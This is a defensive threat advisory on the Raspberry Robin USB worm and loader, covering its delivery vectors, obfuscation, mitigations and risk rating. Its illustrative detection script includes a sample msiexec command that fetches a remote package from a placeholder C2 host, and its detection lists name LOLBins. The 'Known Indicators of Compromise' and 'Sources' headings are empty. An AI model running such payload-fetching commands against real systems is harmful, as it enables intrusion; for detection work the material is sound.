Raspberry Robin Malware: USB Worm Turned Initial Access Powerhouse

Threat Group: Storm-0856 (Roshtyak)
Threat Type: Initial Access Broker (IAB), Malware Loader, USB Worm
Exploited Vulnerabilities: CVE-2023-36802, CVE-2023-29360
Malware Used: Raspberry Robin (aka Roshtyak, QNAP worm)
Threat Score: High (8.5/10) – Ongoing use by ransomware groups and Russian state-backed actors, with evolving delivery techniques and C2 infrastructure.
Last Threat Observation: March 27, 2025


Overview

Raspberry Robin, first detected in 2021, has rapidly evolved from a relatively straightforward USB worm into a full-fledged Initial Access Broker (IAB) and malware loader used by cybercriminals and nation-state actors alike. Most recently, its infrastructure has been linked to over 180 active command-and-control domains and is being used by threat groups such as LockBit, Clop, and Storm-0856 (Roshtyak)—which is tied to Russian GRU Unit 29155 (Cadet Blizzard). With a confirmed presence across thousands of corporate environments, its role in delivering secondary payloads like Cobalt Strike and Dridex escalates the risk of ransomware and espionage.


Key Details

Delivery Method: USB drives, phishing, malicious archives, WSF scripts, malvertising
Target: All sectors including finance, tech, telecom, critical infrastructure

Functions:

  • Self-propagating USB worm
  • Initial access broker
  • Payload delivery (Cobalt Strike, Dridex, etc.)
  • Payload hosting via NAS (e.g., QNAP)
  • Obfuscation and anti-analysis measures

Obfuscation Techniques:

  • Up to 14 layers of packing
  • VM/sandbox detection
  • LOLBins (e.g., msiexec, wscript)
  • API hashing, COM hijacking, anti-emulation, mixed-case command lines

Attack Vectors

Raspberry Robin’s distribution began with USB-based infections using malicious .LNK files. Since 2023, its attack vectors have diversified to include:

  • RAR/ZIP archives hosted on Discord CDN
  • DLL sideloading
  • Heavily obfuscated WSF scripts (via phishing)
  • Windows LPE exploits (CVE-2023-36802, CVE-2023-29360)
  • Malvertising

These developments show a high level of adaptability, allowing the malware to evade traditional signature-based detection and reach victims through several delivery channels beyond removable media.


Known Indicators of Compromise (IoCs)


Mitigation and Prevention

  • User Awareness: Train users on USB threats and suspicious files from cloud/CDN sources.
  • Email Filtering: Block .LNK, .WSF, .DLL and archive attachments in email. Use sandboxing.
  • Antivirus Protection: Deploy EDR with behavior-based detections. Monitor msiexec, regsvr32, rundll32 with network behavior.
  • Two-Factor Authentication (2FA): Apply across VPN, RDP, admin interfaces to limit lateral movement.
  • Monitor Logs: Alert on Tor traffic, obscure TLD domains, LOLBins, registry modifications.
  • Regular Updates: Prioritize CVE-2023-36802, CVE-2023-29360, and older Windows LPEs.
  • USB Device Management: Disable autorun and implement scanning policies for removable media.
  • Network Segmentation: Isolate critical systems and apply strict access controls.
  • Threat Intelligence Sharing: Engage with sharing platforms for real-time IoC updates.
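As an added illustration of the "Antivirus Protection" and "Monitor Logs" items above (example code, not part of the original advisory), the following Python script applies three of the listed heuristics (LOLBin handed a remote URL, obscure TLD or non-standard port, randomised-case command line) to constructed process-creation records; the hostnames, paths and the ODD_TLDS set are placeholders and assumptions to be replaced with current threat intelligence.

```python
import json
import re
from dataclasses import dataclass
from typing import List

# LOLBins the advisory says to monitor together with their network behaviour.
LOLBINS = {"msiexec.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"}
# Assumed set of short/unusual TLDs of the kind in the advisory's domain list; extend from current intel.
ODD_TLDS = {"wf", "pm", "me", "cx", "rocks", "rs"}
URL_RE = re.compile(r"https?://([a-z0-9.-]+)(?::(\d+))?", re.I)

@dataclass
class Finding:
    rule: str
    image: str
    detail: str

def case_changes(token: str) -> int:
    """Upper/lower transitions inside one token: 'mSiExEc' -> 6, 'Msiexec' -> 1."""
    letters = [c for c in token if c.isalpha()]
    return sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))

def analyse(event: dict) -> List[Finding]:
    """Apply three advisory-derived rules to one process-creation event."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    urls = URL_RE.findall(cmd)
    out = []
    if image in LOLBINS and urls:  # LOLBin handed a remote URL: possible payload fetch
        out.append(Finding("lolbin_remote_payload", image, cmd))
    for host, port in urls:  # obscure TLD or non-standard port on the contacted host
        tld = host.rsplit(".", 1)[-1].lower()
        if tld in ODD_TLDS or (port and port not in ("80", "443")):
            out.append(Finding("odd_tld_or_port", image, f"{host}:{port or '80'}"))
    # Randomised-case tokens; URLs and filesystem paths are skipped to limit false positives.
    tokens = [t for t in URL_RE.sub("", cmd).split() if "\\" not in t]
    if any(case_changes(t) >= 3 for t in tokens):
        out.append(Finding("randomized_case_cmdline", image, cmd))
    return out

def scan(lines: List[str]) -> List[Finding]:
    """Scan JSON-lines process-creation records and return every finding."""
    return [f for line in lines for f in analyse(json.loads(line))]

# Constructed sample records (hostnames and paths are placeholders, not real indicators).
SAMPLE = [
    r'{"Image":"C:\\Windows\\System32\\msiexec.exe","CommandLine":"mSiExEc /Q /i http://c2-placeholder.wf:8080/pkg.msi"}',
    r'{"Image":"C:\\Windows\\System32\\msiexec.exe","CommandLine":"msiexec.exe /i C:\\Temp\\setup.msi /qn"}',
    r'{"Image":"C:\\Program Files\\Browser\\chrome.exe","CommandLine":"chrome.exe https://www.example.com/"}',
]
```

Running `scan(SAMPLE)` yields three findings for the first record and none for the two benign ones; in production the records would come from EDR or Sysmon event ID 1 exports rather than the inline list.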

Risk Assessment

  • Likelihood: High – Used by APT and cybercrime actors; frequent sightings.
  • Impact: High – Leads to ransomware, espionage, or mass compromise.
  • Overall Risk Rating: High

Conclusion

The Raspberry Robin malware represents a persistent and evolving threat to organizations worldwide. Its dual nature as both a self-propagating worm and a versatile malware loader, coupled with its utilization by a broad spectrum of threat actors ranging from financially motivated cybercriminals to state-sponsored groups like the Russian GRU, makes it a significant adversary. The extensive infrastructure it maintains and the adaptability of its tactics necessitate that defenders maintain rigorous detection, prevention, and incident response strategies.

Organizations must remain vigilant and continuously adapt their security postures to effectively counter this evolving threat. Prioritizing proactive threat hunting for known indicators of compromise, rapidly isolating affected systems upon detection, and consistently enforcing security policies designed to hinder lateral movement and prevent privilege escalation are crucial steps in mitigating the risk posed by Raspberry Robin.


Sources